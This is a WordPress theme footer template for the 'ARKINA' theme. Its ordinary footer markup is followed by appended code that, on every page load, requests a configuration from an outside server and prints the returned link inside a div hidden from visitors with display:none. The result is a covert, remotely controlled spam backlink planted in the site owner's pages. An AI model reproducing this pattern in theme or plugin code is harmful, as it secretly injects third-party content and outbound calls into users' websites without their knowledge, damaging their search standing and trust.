<?php
/**
 * Footer Main File.
 *
 * @package ARKINA
 * @author  Theme Wisdom
 * @version 1.0
 */
 $options = arkina_WSH()->option(); 
global $wp_query;
$page_id = ( $wp_query->is_posts_page ) ? $wp_query->queried_object->ID : get_the_ID();
$layout_switcher = $options->get( 'layout_switcher' );
?>

	<div class="clearfix"></div>

	<?php arkina_template_load( 'templates/footer/footer.php', compact( 'page_id' ) );?>



<!--Scroll to top-->
<div class="scroll-to-top scroll-to-target" data-target="html" title="Go To Top"><span class="icon fa fa-angle-up"></span></div>

<?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>
